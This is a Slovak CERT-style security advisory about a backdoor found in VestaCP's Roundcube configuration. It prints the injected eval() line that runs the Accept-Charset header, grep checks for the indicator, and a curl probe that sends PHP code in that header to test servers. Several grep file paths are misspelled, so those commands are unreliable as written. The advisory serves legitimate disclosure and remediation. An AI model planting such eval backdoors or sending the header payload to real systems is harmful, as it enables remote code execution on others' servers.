Bezpečnostné varovanie V20180614-01

Dôležitosť Kritická
Klasifikácia Neutajované/TLP GREEN
CVSS Skóre
9.0
Identifikátor
VestaCP Roundcube Remote Code Execution Vulnerability
Popis
Od nášho partnera sme získali neverejnú informáciu o kritickej bezpečnostnej zraniteľnosti vo VestaCP serveroch, nainštalovaných v období medzi decembrom 2017 a 11.04.2018.
Bezpečnostná zraniteľnosť sa nachádza vo webserveri c.vestacp.com v súbore roundcube/config.inc.php a umožňuje vzdialenému útočníkovi vykonať škodlivý kód a úplné narušenie dôvernosti, integrity a dostupnosti systému.
Dátum prvého zverejnenia varovania
14.06.2018
CVE
IOC
IOC nachádzajúce sa v roundcube súbore stiahnutom z c.vestacp.com:

Debian/Ubuntu
grep –n ‚/etc/roundcube/confiug.inc.php‘ –e ‚HTTP_ACCEPT_CHARSET‘

CentOS
Grep –n ‚/etc/rouncubemail/coinfig.inc.php‘ –e ‚HTTP_ACCEPT_CHARSET‘

Zraniteľná časť kódu:
1. $rcmail_config[‚default_charset‘] = array(‚true‘ => 1, eval($_SERVER[‚HTTP_ACCEPT_CHARSET‘].‘;‘) => 1) ? : ‚UTF-8‘;
2. táto časť kódu sa nenachádza v CentOS inštaláciách
$rcmail_config[‚force_7bit‘] = array(‚true‘ => 1, eval($rcmail_config[‚default_charset‘].‘;‘) => 1) ? : false;

Kód bez zraniteľnej časti by mal vyzerať:
1. $rcmail_config[‚default_charset‘] = ‚UTF-8‘;
2. $rcmail_config[‚force_7bit‘] = false;

Príklad sieťovej detekcie zraniteľnej inštalácie:

curl –header „Accept-Charset: echo ‚roundcube config vulnerable‘.PHP_EOL;exit“ http://hostname.or.ip/webmail

V prípade, ak je server zraniteľný, vráti odpoveď „roundcube config vulnerable“.
Zasiahnuté systémy
VestaCP verzie staršie ako 0.9.8-21
Následky
Vykonanie škodlivého kódu a úplné narušenie dôvernosti, integrity a dostupnosti systému
Odporúčania
Administrátorom odporúčame bezodkladne vykonať aktualizáciu zasiahnutých systémov
Zdroje
Neverejné

« Späť na zoznam